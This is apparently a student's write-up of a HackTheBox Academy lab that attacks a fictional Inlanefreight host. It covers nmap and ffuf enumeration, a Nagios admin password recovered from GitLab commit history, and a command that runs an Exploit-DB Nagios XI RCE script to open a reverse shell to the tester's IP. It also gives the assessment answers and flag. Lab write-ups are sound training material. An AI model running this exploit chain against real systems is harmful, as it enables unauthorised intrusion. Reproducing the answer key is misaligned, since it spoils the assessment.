During an external penetration test for the company Inlanefreight, you come across a host that, at first glance, does not seem extremely interesting. At this point in the assessment, you have exhausted all options and hit several dead ends. Looking back through your enumeration notes, something catches your eye about this particular host. You also see a note that you don't recall about the gitlab.inlanefreight.local vhost.
Performing deeper and iterative enumeration reveals several serious flaws. Enumerate the target carefully and answer all the questions below to complete the second part of the skills assessment.
Questions:
What is the URL of the WordPress instance?
reconnaissance
Nmap scan
┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part2]
└─$ sudo nmap -sV -sC 10.129.201.90
[sudo] password for sasorirose:
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-05 07:11 UTC
Nmap scan report for gitlab.inlanefreight.local (10.129.201.90)
Host is up (0.25s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: skills2, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://gitlab.inlanefreight.local:8180/
|_http-server-header: Apache/2.4.41 (Ubuntu)
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
| ssl-cert: Subject: commonName=10.129.201.90/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2021-09-02T01:49:48
|_Not valid after: 2031-08-31T01:49:48
| tls-alpn:
|_ http/1.1
|_http-title: Shipter\xE2\x80\x93Transport and Logistics HTML5 Template
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.41 (Ubuntu)
8180/tcp open http nginx
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://gitlab.inlanefreight.local:8180/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 54 disallowed entries (15 shown)
| / /autocomplete/users /autocomplete/projects /search
| /admin /profile /dashboard /users /help /s/ /-/profile /-/ide/
|_/*/new /*/edit /*/raw
Service Info: Host: skills2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.03 seconds
im doing hackthebox academy lab
help me to analyze, sumary and write up ( first lets do anaylyze nmap scan and enumeration)Enumerate for subdomain:
┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part2]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://10.129.201.90/ -H "Host: FUZZ.inlanefreight.local" -fs 46166 -s
blog
monitoring
gitlab
you can run without:
-fs to filter some response with specific size
-s hide everything except the valid hits
Answer: http://blog.inlanefreight.local
What is the name of the public GitLab project?
After resgister and login with new credential and choose to public project:

Answer: Virtualhost
What is the FQDN of the third vhost?
Answer: monitoring.inlanefreight.local
What application is running on this third vhost? (One word)
After accessing to the monitoring.inlanefreight.local

Answer: Nagios
What is the admin password to access this application?
Get back to enumerate at gitlab instance and hunting for admin password

Enumerate for Nagios Postgresql database

And i found from the commits history
nagiosadmin:oilaKglm7M09@CPL&^lC
Let’s try to login with that credential

Answer: oilaKglm7M09@CPL&^lC
Obtain reverse shell access on the target and submit the contents of the flag.txt file.
Enumerate for Nagios, search for Nagios XI 5.7.X PoC and i found this https://www.exploit-db.com/exploits/49422
python3 nagiosxi-rce.py http://monitoring.inlanefreight.local nagiosadmin 'oilaKglm7M09@CPL&^lC' 10.10.14.29 4444

get reverse shell with exploit script
after do that, i think too complicated to get shell on the host with other user but we can find flag here


Answer: afe377683dce373ec2bf7eaf1e0107eb